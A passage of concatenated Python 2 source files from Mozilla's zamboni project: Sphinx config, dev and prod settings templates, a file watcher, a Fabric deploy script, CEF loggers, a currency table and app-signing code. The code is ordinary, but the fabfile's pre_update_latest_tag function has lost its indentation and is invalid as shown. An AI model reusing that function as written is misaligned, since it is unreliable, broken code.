# dict (instead of mutating it while iterating .items()) is safe on both
# Python 2 (list) and Python 3 (live view).
intersphinx_mapping = dict(
    (key, '_intersphinx/' + val)
    for key, val in intersphinx_mapping.items())
# Root url where source files can be browsed online.
src_base_url = 'http://github.com/mozilla/zamboni/tree/master/'

# https://github.com/snide/sphinx_rtd_theme
# on_rtd is whether we are on readthedocs.org, this line of code grabbed from
# docs.readthedocs.org
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'

# readthedocs.org injects its own theme, so this only matters locally.
if not on_rtd:  # only import and set the theme if we're building docs locally
    import sphinx_rtd_theme
    html_theme = 'sphinx_rtd_theme'
    html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
########NEW FILE########
__FILENAME__ = src_role
"""
Turn :src:`file.py` into a link to `file.py` in your online source browser.
Requires src_base_url to be set in conf.py.
"""
import urlparse
from docutils import nodes
def setup(app):
    # Sphinx extension entry point: register the src_base_url config value
    # and the :src: role implemented below.
    app.add_config_value('src_base_url', None, 'html')
    app.add_role('src', src_role)
def src_role(name, rawtext, text, lineno, inliner, options=None, content=None):
    """Resolve :src:`path` into a reference node pointing at the online repo.

    Reports an error (and renders the raw text as problematic) when
    ``src_base_url`` has not been configured.

    ``options`` and ``content`` previously used mutable defaults ({} / []),
    which are shared between calls; None sentinels avoid that.  Neither is
    used here, and Sphinx passes them positionally, so the signature stays
    compatible.
    """
    base_url = inliner.document.settings.env.config.src_base_url
    if base_url is None:
        msg = inliner.reporter.error('src_base_url is not set', line=lineno)
        prb = inliner.problematic(rawtext, rawtext, msg)
        return [prb], [msg]
    ref = urlparse.urljoin(base_url, text)
    rn = nodes.reference(rawtext, text, refuri=ref)
    return [rn], []
########NEW FILE########
__FILENAME__ = settings_local.dev
from default.settings import *

# Development defaults: verbose errors, eager tasks, local services.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = DEBUG

# These apps are great during development.
INSTALLED_APPS += (
    'debug_toolbar',
    'django_extensions',
    'fixture_magic',
)

# You want one of the caching backends.  Dummy won't do any caching, locmem
# is cleared every time you restart the server, and memcached is what we run
# in production.
#CACHES = {
#    'default': {
#        'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
#        'LOCATION': 'localhost:11211',
#    }
#}

# Here we use the LocMemCache backend from cache-machine, as it interprets
# the "0" timeout parameter of ``cache`` in the same way as the Memcached
# backend: as infinity.  Django's LocMemCache backend interprets it as a
# "0 seconds" timeout (and thus doesn't cache at all).
CACHES = {
    'default': {
        'BACKEND': 'caching.backends.locmem.LocMemCache',
        'LOCATION': 'zamboni',
    }
}

# Caching is required for CSRF to work, please do not use the dummy cache.

DATABASES = {
    'default': {
        'NAME': 'zamboni',
        'ENGINE': 'django.db.backends.mysql',
        'USER': 'root',
        'PASSWORD': '',
        'OPTIONS': {'init_command': 'SET storage_engine=InnoDB'},
        'TEST_CHARSET': 'utf8',
        'TEST_COLLATION': 'utf8_general_ci',
    },
}

# Skip indexing ES to speed things up?
SKIP_SEARCH_INDEX = False

LOG_LEVEL = logging.DEBUG
HAS_SYSLOG = False

# For debug toolbar.
if DEBUG:
    INTERNAL_IPS = ('127.0.0.1',)
    MIDDLEWARE_CLASSES += ('debug_toolbar.middleware.DebugToolbarMiddleware',)
    DEBUG_TOOLBAR_CONFIG = {
        'HIDE_DJANGO_SQL': False,
        'INTERCEPT_REDIRECTS': False,
    }

# If you're not running on SSL you'll want this to be False.
SESSION_COOKIE_SECURE = False
SESSION_COOKIE_DOMAIN = None

# Run tasks immediately, don't try using the queue.
CELERY_ALWAYS_EAGER = True

# Disables custom routing in settings.py so that tasks actually run.
CELERY_ROUTES = {}

# Disable timeout code during development because it uses the signal module
# which can only run in the main thread. Celery uses threads in dev.
VALIDATOR_TIMEOUT = -1

# The user id to use when logging in tasks. You should set this to a user
# that exists in your site.
# TASK_USER_ID = 1

WEBAPPS_RECEIPT_KEY = os.path.join(ROOT, 'mkt/webapps/tests/sample.key')

# If you want to allow self-reviews for add-ons/apps, then enable this.
# In production we do not want to allow this.
ALLOW_SELF_REVIEWS = True

# For Marketplace payments.
APP_PURCHASE_KEY = 'localhost'
APP_PURCHASE_AUD = 'localhost'
APP_PURCHASE_TYP = 'mozilla-local/payments/pay/v1'
APP_PURCHASE_SECRET = 'This secret must match your webpay SECRET'

# Assuming you did `npm install` (and not `-g`) like you were supposed to,
# this will be the path to the `stylus` and `lessc` executables.
STYLUS_BIN = path('node_modules/stylus/bin/stylus')
LESS_BIN = path('node_modules/less/bin/lessc')

# Locally we typically don't run more than 1 elasticsearch node. So we set
# replicas to zero.
ES_DEFAULT_NUM_REPLICAS = 0
########NEW FILE########
__FILENAME__ = settings_local.prod
from settings import *

# Production defaults: debugging off, master/slave DBs, real memcached.
DEBUG = False
TEMPLATE_DEBUG = False

# The default database should point to the master.
DATABASES = {
    'default': {
        'NAME': 'zamboni',
        'ENGINE': 'django.db.backends.mysql',
        'HOST': '',
        'PORT': '',
        'USER': '',
        'PASSWORD': '',
        'OPTIONS': {'init_command': 'SET storage_engine=InnoDB'},
    },
    'slave': {
        'NAME': 'zamboni',
        'ENGINE': 'django.db.backends.mysql',
        'HOST': '',
        'PORT': '',
        'USER': '',
        'PASSWORD': '',
        'OPTIONS': {'init_command': 'SET storage_engine=InnoDB'},
    },
}

# Put the aliases for slave databases in this list.
SLAVE_DATABASES = ['slave']

# Use IP:PORT pairs separated by semicolons.
CACHES = {
    'default': {
        'BACKEND': 'caching.backends.memcached.MemcachedCache',
        'LOCATION': ['localhost:11211', 'localhost:11212'],
        'TIMEOUT': 500,
    }
}

# This is used to hash some things in Django.
SECRET_KEY = 'replace me with something long'

LOG_LEVEL = logging.WARNING

DEBUG_PROPAGATE_EXCEPTIONS = DEBUG

# Sample heka configuration. Uncommented, this would override what is in
# lib/settings_base.py.
# HEKA_CONF = {
#     'logger': 'zamboni',
#     'stream': {
#         'class': 'heka.streams.UdpStream',
#         'host': ['10.0.1.5', '10.0.1.10'],
#         'port': 5566
#     },
#     'plugins': {
#         'raven': ('heka_raven.raven_plugin.config_plugin',
#                   {'dsn': 'udp://username:[email protected]:9000/2'}),
#     },
# }
#
# from heka.config import client_from_dict_config
# HEKA = client_from_dict_config(HEKA_CONF)

# If you want to allow self-reviews for add-ons/apps, then enable this.
# In production we do not want to allow this.
ALLOW_SELF_REVIEWS = False
########NEW FILE########
__FILENAME__ = watcher
"""
Watch a bunch of files and run a command if any changes are detected.
Usage
-----
::
python watcher.py 'echo changes' one.py two.py
To automatically keep Sphinx docs up to date::
python watcher.py 'make html' $(find . -name '*.rst')
Problems
--------
* The file checking would be way more efficient using inotify or whatever the
equivalent is on OS X.
* It doesn't handle bad input or spaces in filenames.
But it works for me.
"""
import os
import sys
import time
# Cache of filename -> last seen mtime, shared across calls.
_mtimes = {}


def timecheck(files):
    """Return True if any of the files have changed.

    Each file's mtime is recorded on first sight.  When any file's mtime
    differs from the recorded one, the cache is cleared (so everything is
    re-recorded on the next call) and True is returned.

    Bug fixed: the original returned False as soon as it saw the first
    unchanged file, so changes to any later file in ``files`` were never
    detected (and the first call returned None instead of False).
    """
    global _mtimes
    changed = False
    for filename in files:
        mtime = os.stat(filename).st_mtime
        if filename not in _mtimes:
            _mtimes[filename] = mtime
        elif mtime != _mtimes[filename]:
            changed = True
    if changed:
        # Reset the cache so all files are re-recorded next time,
        # preserving the original reset-on-change behaviour.
        _mtimes = {}
    return changed
def watcher(command, files):
    """Run ``command`` if any file in ``files`` changes."""
    # Poll once a second, forever; Ctrl-C (KeyboardInterrupt) exits.
    while True:
        files_changed = timecheck(files)
        if files_changed:
            os.system(command)
        time.sleep(1)
def main():
    """Parse argv (command, then files) and start watching."""
    command = sys.argv[1]
    files = sys.argv[2:]
    try:
        watcher(command, files)
    except KeyboardInterrupt:
        # Ctrl-C is the normal way to stop; exit quietly.
        pass


if __name__ == '__main__':
    main()
########NEW FILE########
__FILENAME__ = fabfile
import os
from os.path import join as pjoin
from fabric.api import (env, execute, lcd, local, parallel,
run, roles, task)
import fabdeploytools.envs
from fabdeploytools import helpers
import deploysettings as settings
env.key_filename = settings.SSH_KEY
fabdeploytools.envs.loadenv(settings.CLUSTER)
ROOT, ZAMBONI = helpers.get_app_dirs(__file__)
VIRTUALENV = pjoin(ROOT, 'venv')
PYTHON = pjoin(VIRTUALENV, 'bin', 'python')
def managecmd(cmd):
    """Run a manage.py command using the deployment virtualenv's python."""
    with lcd(ZAMBONI):
        local('%s manage.py %s' % (PYTHON, cmd))
@task
def create_virtualenv(update_on_change=False):
    """Build/refresh the deployment virtualenv from requirements/prod.txt."""
    helpers.create_venv(VIRTUALENV, settings.PYREPO,
                        pjoin(ZAMBONI, 'requirements/prod.txt'),
                        update_on_change=update_on_change)
    # Load-testing clusters need the extra marteau requirements too.
    if settings.LOAD_TESTING:
        helpers.pip_install_reqs(pjoin(ZAMBONI, 'requirements/load.txt'))
@task
def update_locales():
    """Compile the .po locale files to .mo in the checkout."""
    with lcd(pjoin(ZAMBONI, 'locale')):
        local("VENV=%s ./compile-mo.sh ." % VIRTUALENV)
@task
def loadtest(repo=''):
    """Kick off a marteau load test, if MARTEAU is configured."""
    if hasattr(settings, 'MARTEAU'):
        # marteau authenticates via MACAuth credentials in the environment.
        os.environ['MACAUTH_USER'] = settings.MARTEAU_USER
        os.environ['MACAUTH_SECRET'] = settings.MARTEAU_SECRET
        local('%s %s --server %s' % (settings.MARTEAU, repo,
                                     settings.MARTEAU_SERVER))
@task
def update_products():
    """Refresh the cached Mozilla product details."""
    managecmd('update_product_details')
@task
def compress_assets(arg=''):
    """Minify/concatenate static assets; extra flags pass through via arg."""
    managecmd('compress_assets -t %s' % arg)
@task
def schematic():
    """Apply outstanding database migrations with schematic."""
    with lcd(ZAMBONI):
        local("%s %s/bin/schematic migrations" %
              (PYTHON, VIRTUALENV))
@task
def update_info(ref='origin/master'):
    """Log git info and record the deployed revision in media/git-rev.txt."""
    helpers.git_info(ZAMBONI)
    with lcd(ZAMBONI):
        local("/bin/bash -c "
              "'source /etc/bash_completion.d/git && __git_ps1'")
        # Short hash of the deployed ref, served to clients for cache-busting.
        local('git show -s {0} --pretty="format:%h" '
              '> media/git-rev.txt'.format(ref))
@task
def disable_cron():
    """Remove the generated crontab so no jobs run during the deploy."""
    local("rm -f /etc/cron.d/%s" % settings.CRON_NAME)
@task
def install_cron(installed_dir):
    """Generate and atomically install the crontab for the deployed code."""
    installed_zamboni_dir = os.path.join(installed_dir, 'zamboni')
    installed_python = os.path.join(installed_dir, 'venv', 'bin', 'python')
    with lcd(ZAMBONI):
        local('%s ./scripts/crontab/gen-cron.py '
              '-z %s -u %s -p %s > /etc/cron.d/.%s' %
              (PYTHON, installed_zamboni_dir,
               getattr(settings, 'CRON_USER', 'apache'),
               installed_python, settings.CRON_NAME))
        # Write to a dotfile first, then mv into place, so cron never
        # reads a half-written file.
        local('mv /etc/cron.d/.%s /etc/cron.d/%s' % (settings.CRON_NAME,
                                                     settings.CRON_NAME))
@task
@roles('celery')
@parallel
def update_celery():
    """Restart the AMO and MKT celery services on all celery hosts."""
    restarts = []
    if getattr(settings, 'CELERY_SERVICE_PREFIX', False):
        restarts.extend(['supervisorctl restart {0}{1} &'.format(
            settings.CELERY_SERVICE_PREFIX, x)
            for x in ('', '-devhub', '-priority', '-limited')])
    if getattr(settings, 'CELERY_SERVICE_MKT_PREFIX', False):
        restarts.extend(['supervisorctl restart {0}{1} &'.format(
            settings.CELERY_SERVICE_MKT_PREFIX, x)
            for x in ('', '-devhub', '-priority', '-limited')])
    if restarts:
        # The trailing '&' backgrounds each restart; 'wait' blocks until
        # every one of them has finished.
        run('%s wait' % ' '.join(restarts))
@task
def deploy():
    """Full deploy: package, push to web+celery hosts, restart services."""
    rpmbuild = helpers.deploy(name='zamboni',
                              env=settings.ENV,
                              cluster=settings.CLUSTER,
                              domain=settings.DOMAIN,
                              root=ROOT,
                              deploy_roles=['web', 'celery'],
                              package_dirs=['zamboni', 'venv'])
    helpers.restart_uwsgi(getattr(settings, 'UWSGI', []))
    execute(update_celery)
    # Cron must point at the freshly-installed tree, not the build dir.
    execute(install_cron, rpmbuild.install_to)
    managecmd('cron cleanup_validation_results')
@task
def deploy_web():
    """Deploy to web hosts only (no celery restart, no cron install)."""
    helpers.deploy(name='zamboni',
                   env=settings.ENV,
                   cluster=settings.CLUSTER,
                   domain=settings.DOMAIN,
                   root=ROOT,
                   use_yum=False,
                   package_dirs=['zamboni', 'venv'])
    helpers.restart_uwsgi(getattr(settings, 'UWSGI', []))
@task
def pre_update(ref=settings.UPDATE_REF):
    """Pre-deploy step: stop cron and update the checkout to ``ref``."""
    local('date')
    execute(disable_cron)
    execute(helpers.git_update, ZAMBONI, ref)
    execute(update_info, ref)
@task
def update():
    """Build step: virtualenv, locales, product details, assets, migrations."""
    execute(create_virtualenv, getattr(settings, 'DEV', False))
    execute(update_locales)
    execute(update_products)
    execute(compress_assets, arg='--settings=settings_local_mkt')
    execute(schematic)
    managecmd('dump_apps')
    managecmd('statsd_ping --key=update')
@task
def pre_update_latest_tag():
current_tag_file = os.path.join(ZAMBONI, '.tag')
latest_tag = helpers.git_latest_tag(ZAMBONI)
with open(current_tag_file, 'r+') as f:
if f.read() == latest_tag:
print 'Environemnt is at %s' % latest_tag
else:
pre_update(latest_tag)
f.seek(0)
f.write(latest_tag)
f.truncate()
########NEW FILE########
__FILENAME__ = cef_loggers
"""Our app specific CEF loggers."""
from django.conf import settings
from django.http import HttpRequest
from cef import log_cef as _log_cef
heka = settings.HEKA
class CEFLogger:
    """Abstract base CEF logger.

    Class attributes to set in a concrete class:

    **sig_prefix**
        Prefix to the CEF signature. Example: RECEIPT

    **cs2label**
        cs2label parameter. Example: ReceiptTransaction

    **msg_prefix**
        Prefix to all CEF log messages. Example: Receipt

    **default_severity**
        If set, this should be a 0-10 int.
    """
    sig_prefix = ''
    cs2label = None
    msg_prefix = ''
    default_severity = None

    def log(self, environ, app, msg, longer, severity=None,
            extra_kwargs=None):
        """Log something important using the CEF library.

        Parameters:

        **environ**
            Typically a Django request object. It can also be
            a plain dict.
        **app**
            An app/addon object.
        **msg**
            A short message about the incident.
        **longer**
            A more description message about the incident.
        **severity=None**
            A 0-10 int to override the default severity.
        **extra_kwargs**
            A dict to override anything sent to the CEF library.
        """
        # CEF product/config metadata, with AMO-flavoured defaults.
        c = {'cef.product': getattr(settings, 'CEF_PRODUCT', 'AMO'),
             'cef.vendor': getattr(settings, 'CEF_VENDOR', 'Mozilla'),
             'cef.version': getattr(settings, 'CEF_VERSION', '0'),
             'cef.device_version': getattr(settings,
                                           'CEF_DEVICE_VERSION',
                                           '0'),
             'cef.file': getattr(settings, 'CEF_FILE', 'syslog'), }
        user = getattr(environ, 'amo_user', None)
        # Sometimes app is a string, eg: "unknown". Boo!
        try:
            app_str = app.pk
        except AttributeError:
            app_str = app
        kwargs = {'username': getattr(user, 'name', ''),
                  'suid': str(getattr(user, 'pk', '')),
                  'signature': '%s%s' % (self.sig_prefix, msg.upper()),
                  'msg': longer, 'config': c,
                  # Until the CEF log can cope with unicode app names, just
                  # use primary keys.
                  'cs2': app_str, 'cs2Label': self.cs2label}
        if extra_kwargs:
            kwargs.update(extra_kwargs)
        if not severity:
            severity = self.default_severity
        if not severity:
            # A severity must come from either the caller or the subclass.
            raise ValueError('CEF severity was not defined')
        if isinstance(environ, HttpRequest):
            # The CEF library expects a WSGI environ dict, not a request.
            environ = environ.META.copy()
        if settings.USE_HEKA_FOR_CEF:
            return heka.cef('%s %s' % (self.msg_prefix, msg), severity,
                            environ, **kwargs)
        else:
            return _log_cef('%s %s' % (self.msg_prefix, msg),
                            severity, environ, **kwargs)
class ReceiptCEFLogger(CEFLogger):
    """CEF logger for receipt transactions."""
    sig_prefix = 'RECEIPT'
    cs2label = 'ReceiptTransaction'
    msg_prefix = 'Receipt'
    default_severity = 5


# Module-level singleton used by callers.
receipt_cef = ReceiptCEFLogger()
class AppPayCEFLogger(CEFLogger):
    """
    Anything to do with app payments.
    """
    sig_prefix = 'APP_PAY'
    cs2label = 'AppPayment'
    msg_prefix = 'AppPayment'
    default_severity = 5


# Module-level singleton used by callers.
app_pay_cef = AppPayCEFLogger()
########NEW FILE########
__FILENAME__ = constants
# -*- coding: utf8 -*-
from tower import ugettext_lazy as _lazy
# Mapping of ISO 4217 currency code to a lazily-translated currency name.
# Consistency fix: the 'TOP' entry was the only byte-string literal in an
# otherwise all-unicode mapping; it now carries the u prefix like the rest.
ALL_CURRENCIES = {
    'AED': _lazy(u'United Arab Emirates Dirham'),
    'AFN': _lazy(u'Afghanistan Afghani'),
    'ALL': _lazy(u'Albania Lek'),
    'AMD': _lazy(u'Armenia Dram'),
    'ANG': _lazy(u'Netherlands Antilles Guilder'),
    'AOA': _lazy(u'Angola Kwanza'),
    'ARS': _lazy(u'Argentina Peso'),
    'AUD': _lazy(u'Australia Dollar'),
    'AWG': _lazy(u'Aruba Guilder'),
    'AZN': _lazy(u'Azerbaijan New Manat'),
    'BAM': _lazy(u'Bosnia and Herzegovina Convertible Marka'),
    'BBD': _lazy(u'Barbados Dollar'),
    'BDT': _lazy(u'Bangladesh Taka'),
    'BGN': _lazy(u'Bulgaria Lev'),
    'BHD': _lazy(u'Bahrain Dinar'),
    'BIF': _lazy(u'Burundi Franc'),
    'BMD': _lazy(u'Bermuda Dollar'),
    'BND': _lazy(u'Brunei Darussalam Dollar'),
    'BOB': _lazy(u'Bolivia Boliviano'),
    'BRL': _lazy(u'Brazil Real'),
    'BSD': _lazy(u'Bahamas Dollar'),
    'BTN': _lazy(u'Bhutan Ngultrum'),
    'BWP': _lazy(u'Botswana Pula'),
    'BYR': _lazy(u'Belarus Ruble'),
    'BZD': _lazy(u'Belize Dollar'),
    'CAD': _lazy(u'Canada Dollar'),
    'CDF': _lazy(u'Congo/Kinshasa Franc'),
    'CHF': _lazy(u'Switzerland Franc'),
    'CLP': _lazy(u'Chile Peso'),
    'CNY': _lazy(u'China Yuan Renminbi'),
    'COP': _lazy(u'Colombia Peso'),
    'CRC': _lazy(u'Costa Rica Colon'),
    'CUC': _lazy(u'Cuba Convertible Peso'),
    'CUP': _lazy(u'Cuba Peso'),
    'CVE': _lazy(u'Cape Verde Escudo'),
    'CZK': _lazy(u'Czech Republic Koruna'),
    'DJF': _lazy(u'Djibouti Franc'),
    'DKK': _lazy(u'Denmark Krone'),
    'DOP': _lazy(u'Dominican Republic Peso'),
    'DZD': _lazy(u'Algeria Dinar'),
    'EGP': _lazy(u'Egypt Pound'),
    'ERN': _lazy(u'Eritrea Nakfa'),
    'ETB': _lazy(u'Ethiopia Birr'),
    'EUR': _lazy(u'Euro Member Countries'),
    'FJD': _lazy(u'Fiji Dollar'),
    'FKP': _lazy(u'Falkland Islands (Malvinas) Pound'),
    'GBP': _lazy(u'United Kingdom Pound'),
    'GEL': _lazy(u'Georgia Lari'),
    'GGP': _lazy(u'Guernsey Pound'),
    'GHS': _lazy(u'Ghana Cedi'),
    'GIP': _lazy(u'Gibraltar Pound'),
    'GMD': _lazy(u'Gambia Dalasi'),
    'GNF': _lazy(u'Guinea Franc'),
    'GTQ': _lazy(u'Guatemala Quetzal'),
    'GYD': _lazy(u'Guyana Dollar'),
    'HKD': _lazy(u'Hong Kong Dollar'),
    'HNL': _lazy(u'Honduras Lempira'),
    'HRK': _lazy(u'Croatia Kuna'),
    'HTG': _lazy(u'Haiti Gourde'),
    'HUF': _lazy(u'Hungary Forint'),
    'IDR': _lazy(u'Indonesia Rupiah'),
    'ILS': _lazy(u'Israel Shekel'),
    'IMP': _lazy(u'Isle of Man Pound'),
    'INR': _lazy(u'India Rupee'),
    'IQD': _lazy(u'Iraq Dinar'),
    'IRR': _lazy(u'Iran Rial'),
    'ISK': _lazy(u'Iceland Krona'),
    'JEP': _lazy(u'Jersey Pound'),
    'JMD': _lazy(u'Jamaica Dollar'),
    'JOD': _lazy(u'Jordan Dinar'),
    'JPY': _lazy(u'Japan Yen'),
    'KES': _lazy(u'Kenya Shilling'),
    'KGS': _lazy(u'Kyrgyzstan Som'),
    'KHR': _lazy(u'Cambodia Riel'),
    'KMF': _lazy(u'Comoros Franc'),
    'KPW': _lazy(u'Korea (North) Won'),
    'KRW': _lazy(u'Korea (South) Won'),
    'KWD': _lazy(u'Kuwait Dinar'),
    'KYD': _lazy(u'Cayman Islands Dollar'),
    'KZT': _lazy(u'Kazakhstan Tenge'),
    'LAK': _lazy(u'Laos Kip'),
    'LBP': _lazy(u'Lebanon Pound'),
    'LKR': _lazy(u'Sri Lanka Rupee'),
    'LRD': _lazy(u'Liberia Dollar'),
    'LSL': _lazy(u'Lesotho Loti'),
    'LTL': _lazy(u'Lithuania Litas'),
    'LVL': _lazy(u'Latvia Lat'),
    'LYD': _lazy(u'Libya Dinar'),
    'MAD': _lazy(u'Morocco Dirham'),
    'MDL': _lazy(u'Moldova Leu'),
    'MGA': _lazy(u'Madagascar Ariary'),
    'MKD': _lazy(u'Macedonia Denar'),
    'MMK': _lazy(u'Myanmar (Burma) Kyat'),
    'MNT': _lazy(u'Mongolia Tughrik'),
    'MOP': _lazy(u'Macau Pataca'),
    'MRO': _lazy(u'Mauritania Ouguiya'),
    'MUR': _lazy(u'Mauritius Rupee'),
    'MVR': _lazy(u'Maldives (Maldive Islands) Rufiyaa'),
    'MWK': _lazy(u'Malawi Kwacha'),
    'MXN': _lazy(u'Mexico Peso'),
    'MYR': _lazy(u'Malaysia Ringgit'),
    'MZN': _lazy(u'Mozambique Metical'),
    'NAD': _lazy(u'Namibia Dollar'),
    'NGN': _lazy(u'Nigeria Naira'),
    'NIO': _lazy(u'Nicaragua Cordoba'),
    'NOK': _lazy(u'Norway Krone'),
    'NPR': _lazy(u'Nepal Rupee'),
    'NZD': _lazy(u'New Zealand Dollar'),
    'OMR': _lazy(u'Oman Rial'),
    'PAB': _lazy(u'Panama Balboa'),
    'PEN': _lazy(u'Peru Nuevo Sol'),
    'PGK': _lazy(u'Papua New Guinea Kina'),
    'PHP': _lazy(u'Philippines Peso'),
    'PKR': _lazy(u'Pakistan Rupee'),
    'PLN': _lazy(u'Poland Zloty'),
    'PYG': _lazy(u'Paraguay Guarani'),
    'QAR': _lazy(u'Qatar Riyal'),
    'RON': _lazy(u'Romania New Leu'),
    'RSD': _lazy(u'Serbia Dinar'),
    'RUB': _lazy(u'Russia Ruble'),
    'RWF': _lazy(u'Rwanda Franc'),
    'SAR': _lazy(u'Saudi Arabia Riyal'),
    'SBD': _lazy(u'Solomon Islands Dollar'),
    'SCR': _lazy(u'Seychelles Rupee'),
    'SDG': _lazy(u'Sudan Pound'),
    'SEK': _lazy(u'Sweden Krona'),
    'SGD': _lazy(u'Singapore Dollar'),
    'SHP': _lazy(u'Saint Helena Pound'),
    'SLL': _lazy(u'Sierra Leone Leone'),
    'SOS': _lazy(u'Somalia Shilling'),
    'SPL': _lazy(u'Seborga Luigino'),
    'SRD': _lazy(u'Suriname Dollar'),
    'STD': _lazy(u'São Tomé and Príncipe Dobra'),
    'SVC': _lazy(u'El Salvador Colon'),
    'SYP': _lazy(u'Syria Pound'),
    'SZL': _lazy(u'Swaziland Lilangeni'),
    'THB': _lazy(u'Thailand Baht'),
    'TJS': _lazy(u'Tajikistan Somoni'),
    'TMT': _lazy(u'Turkmenistan Manat'),
    'TND': _lazy(u'Tunisia Dinar'),
    'TOP': _lazy(u"Tonga Pa'anga"),
    'TRY': _lazy(u'Turkey Lira'),
    'TTD': _lazy(u'Trinidad and Tobago Dollar'),
    'TVD': _lazy(u'Tuvalu Dollar'),
    'TWD': _lazy(u'Taiwan New Dollar'),
    'TZS': _lazy(u'Tanzania Shilling'),
    'UAH': _lazy(u'Ukraine Hryvna'),
    'UGX': _lazy(u'Uganda Shilling'),
    'USD': _lazy(u'United States Dollar'),
    'UYU': _lazy(u'Uruguay Peso'),
    'UZS': _lazy(u'Uzbekistan Som'),
    'VEF': _lazy(u'Venezuela Bolivar'),
    'VND': _lazy(u'Viet Nam Dong'),
    'VUV': _lazy(u'Vanuatu Vatu'),
    'WST': _lazy(u'Samoa Tala'),
    'XAF': _lazy(u'Communauté Financière Africaine (BEAC) CFA Franc BEAC'),
    'XCD': _lazy(u'East Caribbean Dollar'),
    'XDR': _lazy(u'International Monetary Fund (IMF) Special Drawing Rights'),
    'XOF': _lazy(u'Communauté Financière Africaine (BCEAO) Franc'),
    'XPF': _lazy(u'Comptoirs Français du Pacifique (CFP) Franc'),
    'YER': _lazy(u'Yemen Rial'),
    'ZAR': _lazy(u'South Africa Rand'),
    'ZMW': _lazy(u'Zambia Kwacha'),
    'ZWD': _lazy(u'Zimbabwe Dollar')
}
########NEW FILE########
__FILENAME__ = packaged
import json
import os
import shutil
import tempfile
from django.conf import settings
from django.core.files.storage import default_storage as storage
from base64 import b64decode
from celeryutils import task
import commonware.log
from django_statsd.clients import statsd
from signing_clients.apps import JarExtractor
import requests
import amo
from versions.models import Version
log = commonware.log.getLogger('z.crypto')
class SigningError(Exception):
    """Raised when app signing fails at any stage."""
    pass
def sign_app(src, dest, ids, reviewer=False):
    """Sign the app archive at ``src``, writing the result to ``dest``.

    A temp file is used as scratch space for the signed jar and is always
    cleaned up, even on failure.
    """
    # mkstemp (unlike the deprecated, race-prone mktemp) creates the file
    # atomically, so no other process can hijack the path before we use it.
    fd, tempname = tempfile.mkstemp()
    os.close(fd)
    try:
        return _sign_app(src, dest, ids, reviewer, tempname)
    finally:
        try:
            os.unlink(tempname)
        except OSError:
            # If the file has already been removed, don't worry about it.
            pass
def _sign_app(src, dest, ids, reviewer, tempname):
    """
    Generate a manifest and signature and send signature to signing server to
    be signed.
    """
    active_endpoint = _get_endpoint(reviewer)
    timeout = settings.SIGNED_APPS_SERVER_TIMEOUT
    if not active_endpoint:
        # No signing server is configured/active: fall back to a plain
        # copy so local development still works.
        _no_sign(src, dest)
        return
    # Extract necessary info from the archive
    try:
        jar = JarExtractor(
            storage.open(src, 'r'), tempname,
            ids,
            omit_signature_sections=settings.SIGNED_APPS_OMIT_PER_FILE_SIGS)
    except:
        log.error('Archive extraction failed. Bad archive?', exc_info=True)
        raise SigningError('Archive extraction failed. Bad archive?')
    log.info('App signature contents: %s' % jar.signatures)
    log.info('Calling service: %s' % active_endpoint)
    try:
        with statsd.timer('services.sign.app'):
            response = requests.post(active_endpoint, timeout=timeout,
                                     files={'file': ('zigbert.sf',
                                                     str(jar.signatures))})
    except requests.exceptions.HTTPError, error:
        # Will occur when a 3xx or greater code is returned.
        log.error('Posting to app signing failed: %s, %s' % (
            error.response.status, error))
        raise SigningError('Posting to app signing failed: %s, %s' % (
            error.response.status, error))
    except:
        # Will occur when some other error occurs.
        log.error('Posting to app signing failed', exc_info=True)
        raise SigningError('Posting to app signing failed')
    if response.status_code != 200:
        log.error('Posting to app signing failed: %s' % response.reason)
        raise SigningError('Posting to app signing failed: %s'
                           % response.reason)
    # The service returns the PKCS#7 signature base64-encoded in JSON.
    pkcs7 = b64decode(json.loads(response.content)['zigbert.rsa'])
    try:
        jar.make_signed(pkcs7)
    except:
        log.error('App signing failed', exc_info=True)
        raise SigningError('App signing failed')
    # Copy the signed archive from the temp file into (storage) dest.
    with storage.open(dest, 'w') as destf:
        tempf = open(tempname)
        shutil.copyfileobj(tempf, destf)
def _get_endpoint(reviewer=False):
    """
    Returns the proper API endpoint depending whether we are signing for
    reviewer or for public consumption.

    Returns None when the relevant signing server is not active; raises
    ValueError when it is active but no server URL is configured.
    """
    if reviewer:
        active = settings.SIGNED_APPS_REVIEWER_SERVER_ACTIVE
        server = settings.SIGNED_APPS_REVIEWER_SERVER
    else:
        active = settings.SIGNED_APPS_SERVER_ACTIVE
        server = settings.SIGNED_APPS_SERVER
    if not active:
        # Signing disabled: callers treat a falsy endpoint as "don't sign".
        return None
    if not server:
        # If no API endpoint is set. Just ignore this request.
        raise ValueError(
            'Invalid config. The %sserver setting is empty.' % (
                'reviewer ' if reviewer else ''))
    return server + '/1.0/sign_app'
def _no_sign(src, dest):
    """Copy ``src`` to ``dest`` unsigned (local development fallback)."""
    # If this is a local development instance, just copy the file around
    # so that everything seems to work locally.
    log.info('Not signing the app, no signing server is active.')
    dest_dir = os.path.dirname(dest)
    if not os.path.exists(dest_dir):
        os.makedirs(dest_dir)
    shutil.copy(src, dest)
@task
def sign(version_id, reviewer=False, resign=False, **kw):
    """Sign the packaged app for ``version_id`` and return the signed path.

    ``reviewer`` selects the reviewer signing path/server; ``resign``
    forces re-signing even when a signed file already exists.  Raises
    SigningError when the version is not a packaged app, has no file, or
    signing itself fails.
    """
    version = Version.objects.get(pk=version_id)
    app = version.addon
    log.info('Signing version: %s of app: %s' % (version_id, app))
    if not app.type == amo.ADDON_WEBAPP:
        log.error('[Webapp:%s] Attempt to sign something other than an app.' %
                  app.id)
        raise SigningError('Not an app')
    if not app.is_packaged:
        log.error('[Webapp:%s] Attempt to sign a non-packaged app.' % app.id)
        raise SigningError('Not packaged')
    try:
        file_obj = version.all_files[0]
    except IndexError:
        log.error(
            '[Webapp:%s] Attempt to sign an app with no files in version.' %
            app.id)
        raise SigningError('No file')
    path = (file_obj.signed_reviewer_file_path if reviewer else
            file_obj.signed_file_path)
    if storage.exists(path) and not resign:
        # Already signed and not forcing a resign: reuse the existing file.
        log.info('[Webapp:%s] Already signed app exists.' % app.id)
        return path
    ids = json.dumps({
        'id': app.guid,
        'version': version_id
    })
    with statsd.timer('services.sign.app'):
        try:
            sign_app(file_obj.file_path, path, ids, reviewer)
        except SigningError:
            log.info('[Webapp:%s] Signing failed' % app.id)
            # Don't leave a partially-written signed file behind.
            if storage.exists(path):
                storage.delete(path)
